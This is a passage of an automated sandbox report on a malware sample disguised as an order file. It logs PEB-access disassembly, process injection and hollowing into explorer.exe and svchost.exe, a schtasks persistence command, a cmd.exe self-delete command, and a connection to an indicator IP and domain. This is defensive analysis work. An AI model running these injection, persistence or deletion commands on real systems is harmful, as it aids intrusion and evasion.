          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03194BAD mov eax, dword ptr fs:[00000030h]23_2_03194BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03194BAD mov eax, dword ptr fs:[00000030h]23_2_03194BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032123E3 mov ecx, dword ptr fs:[00000030h]23_2_032123E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032123E3 mov ecx, dword ptr fs:[00000030h]23_2_032123E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032123E3 mov eax, dword ptr fs:[00000030h]23_2_032123E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031E53CA mov eax, dword ptr fs:[00000030h]23_2_031E53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031E53CA mov eax, dword ptr fs:[00000030h]23_2_031E53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318DBE9 mov eax, dword ptr fs:[00000030h]23_2_0318DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031903E2 mov eax, dword ptr fs:[00000030h]23_2_031903E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031903E2 mov eax, dword ptr fs:[00000030h]23_2_031903E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031903E2 mov eax, dword ptr fs:[00000030h]23_2_031903E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031903E2 mov eax, dword ptr fs:[00000030h]23_2_031903E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031903E2 mov eax, dword ptr fs:[00000030h]23_2_031903E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031903E2 mov eax, dword ptr fs:[00000030h]23_2_031903E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316AA16 mov eax, dword ptr fs:[00000030h]23_2_0316AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316AA16 mov eax, dword ptr fs:[00000030h]23_2_0316AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03183A1C mov eax, dword ptr fs:[00000030h]23_2_03183A1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03165210 mov eax, dword ptr fs:[00000030h]23_2_03165210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03165210 mov ecx, dword ptr fs:[00000030h]23_2_03165210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03165210 mov eax, dword ptr fs:[00000030h]23_2_03165210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03165210 mov eax, dword ptr fs:[00000030h]23_2_03165210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03178A0A mov eax, dword ptr fs:[00000030h]23_2_03178A0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A229 mov eax, dword ptr fs:[00000030h]23_2_0318A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322AA16 mov eax, dword ptr fs:[00000030h]23_2_0322AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322AA16 mov eax, dword ptr fs:[00000030h]23_2_0322AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A4A2C mov eax, dword ptr fs:[00000030h]23_2_031A4A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A4A2C mov eax, dword ptr fs:[00000030h]23_2_031A4A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03238A62 mov eax, dword ptr fs:[00000030h]23_2_03238A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0321B260 mov eax, dword ptr fs:[00000030h]23_2_0321B260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0321B260 mov eax, dword ptr fs:[00000030h]23_2_0321B260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031F4257 mov eax, dword ptr fs:[00000030h]23_2_031F4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03169240 mov eax, dword ptr fs:[00000030h]23_2_03169240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03169240 mov eax, dword ptr fs:[00000030h]23_2_03169240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03169240 mov eax, dword ptr fs:[00000030h]23_2_03169240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03169240 mov eax, dword ptr fs:[00000030h]23_2_03169240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A927A mov eax, dword ptr fs:[00000030h]23_2_031A927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322EA55 mov eax, dword ptr fs:[00000030h]23_2_0322EA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319D294 mov eax, dword ptr fs:[00000030h]23_2_0319D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319D294 mov eax, dword ptr fs:[00000030h]23_2_0319D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0317AAB0 mov eax, dword ptr fs:[00000030h]23_2_0317AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0317AAB0 mov eax, dword ptr fs:[00000030h]23_2_0317AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319FAB0 mov eax, dword ptr fs:[00000030h]23_2_0319FAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031652A5 mov eax, dword ptr fs:[00000030h]23_2_031652A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031652A5 mov eax, dword ptr fs:[00000030h]23_2_031652A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031652A5 mov eax, dword ptr fs:[00000030h]23_2_031652A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031652A5 mov eax, dword ptr fs:[00000030h]23_2_031652A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031652A5 mov eax, dword ptr fs:[00000030h]23_2_031652A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF mov eax, dword ptr fs:[00000030h]23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03192ACB mov eax, dword ptr fs:[00000030h]23_2_03192ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03192AE4 mov eax, dword ptr fs:[00000030h]23_2_03192AE4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03169100 mov eax, dword ptr fs:[00000030h]23_2_03169100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03169100 mov eax, dword ptr fs:[00000030h]23_2_03169100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03169100 mov eax, dword ptr fs:[00000030h]23_2_03169100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319513A mov eax, dword ptr fs:[00000030h]23_2_0319513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319513A mov eax, dword ptr fs:[00000030h]23_2_0319513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03184120 mov eax, dword ptr fs:[00000030h]23_2_03184120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03184120 mov eax, dword ptr fs:[00000030h]23_2_03184120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03184120 mov eax, dword ptr fs:[00000030h]23_2_03184120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03184120 mov eax, dword ptr fs:[00000030h]23_2_03184120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03184120 mov ecx, dword ptr fs:[00000030h]23_2_03184120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318B944 mov eax, dword ptr fs:[00000030h]23_2_0318B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318B944 mov eax, dword ptr fs:[00000030h]23_2_0318B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316B171 mov eax, dword ptr fs:[00000030h]23_2_0316B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316B171 mov eax, dword ptr fs:[00000030h]23_2_0316B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316C962 mov eax, dword ptr fs:[00000030h]23_2_0316C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032249A4 mov eax, dword ptr fs:[00000030h]23_2_032249A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032249A4 mov eax, dword ptr fs:[00000030h]23_2_032249A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032249A4 mov eax, dword ptr fs:[00000030h]23_2_032249A4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.filmarabia.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeMemory written: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1130000Jump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess created: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'Jump to behavior
          Source: explorer.exe, 00000012.00000000.307222861.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000012.00000000.308124549.0000000001980000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.475664025.00000000045D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmp, svchost.exe, 00000017.00000002.475664025.00000000045D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000012.00000000.308124549.0000000001980000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.475664025.00000000045D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000012.00000000.308124549.0000000001980000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.475664025.00000000045D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
